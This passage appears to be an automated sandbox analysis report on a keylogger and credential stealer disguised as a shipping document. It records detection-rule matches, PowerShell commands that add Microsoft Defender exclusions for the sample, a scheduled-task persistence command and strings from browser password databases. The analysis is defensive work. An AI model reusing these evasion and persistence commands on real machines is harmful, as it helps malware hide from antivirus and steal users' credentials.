                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CEE5F18_2_056CEE5F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C1A5018_2_056C1A50
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C462018_2_056C4620
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CAA0018_2_056CAA00
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C6A1818_2_056C6A18
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C461018_2_056C4610
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C22F018_2_056C22F0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CF2F018_2_056CF2F0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C72C818_2_056C72C8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C4EC218_2_056C4EC2
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C4ED018_2_056C4ED0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C1EA818_2_056C1EA8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C72B818_2_056C72B8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CCE8018_2_056CCE80
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C1E9818_2_056C1E98
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CAE9018_2_056CAE90
Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs Shipment advice H-BL Draft.exe
Source: Shipment advice H-BL Draft.exe, 00000000.00000000.1250605088.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebwhC.exe2 vs Shipment advice H-BL Draft.exe
Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1317035907.00000000033BA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs Shipment advice H-BL Draft.exe
Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1324698033.0000000007A90000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs Shipment advice H-BL Draft.exe
Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1317035907.0000000003173000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs Shipment advice H-BL Draft.exe
Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1325291879.0000000007D10000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Shipment advice H-BL Draft.exe
Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1317035907.0000000003340000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs Shipment advice H-BL Draft.exe
Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1314558239.000000000148E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Shipment advice H-BL Draft.exe
Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3712482234.0000000000446000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs Shipment advice H-BL Draft.exe
Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3713690951.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Shipment advice H-BL Draft.exe
Source: Shipment advice H-BL Draft.exe | Binary or memory string: OriginalFilenamebwhC.exe2 vs Shipment advice H-BL Draft.exe
Source: Shipment advice H-BL Draft.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 13.2.Shipment advice H-BL Draft.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR | Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: Shipment advice H-BL Draft.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PrcGlGVKeUCXxg.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, -----.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, -----.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, -----.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, -----.cs | Base64 encoded string: 'v0ltr/3dlbbx6irPTVKppc2pWh/8WgMBIACn2VCCzUsYJe8sqS1U2gQ1pbwsMcX0'
Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, -----.cs | Base64 encoded string: 'v0ltr/3dlbbx6irPTVKppc2pWh/8WgMBIACn2VCCzUsYJe8sqS1U2gQ1pbwsMcX0'
Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, -----.cs | Base64 encoded string: 'v0ltr/3dlbbx6irPTVKppc2pWh/8WgMBIACn2VCCzUsYJe8sqS1U2gQ1pbwsMcX0'
Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, NA6WibgODSO7bBliZq.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, NA6WibgODSO7bBliZq.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, NA6WibgODSO7bBliZq.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, C4mUUbO6hDslyPplLx.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, C4mUUbO6hDslyPplLx.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@21/15@3/3
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | File created: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Mutant created: \Sessions\1\BaseNamedObjects\VTUBEvDOt
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1156:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | File created: C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp
Source: Shipment advice H-BL Draft.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Shipment advice H-BL Draft.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002C1D000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.000000000305C000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.000000000306B000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.000000000304D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Shipment advice H-BL Draft.exe | Virustotal: Detection: 63%
Source: Shipment advice H-BL Draft.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | File read: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe
Source: unknown | Process created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Process created: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp"
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp"
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Process created: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: propsys.dll
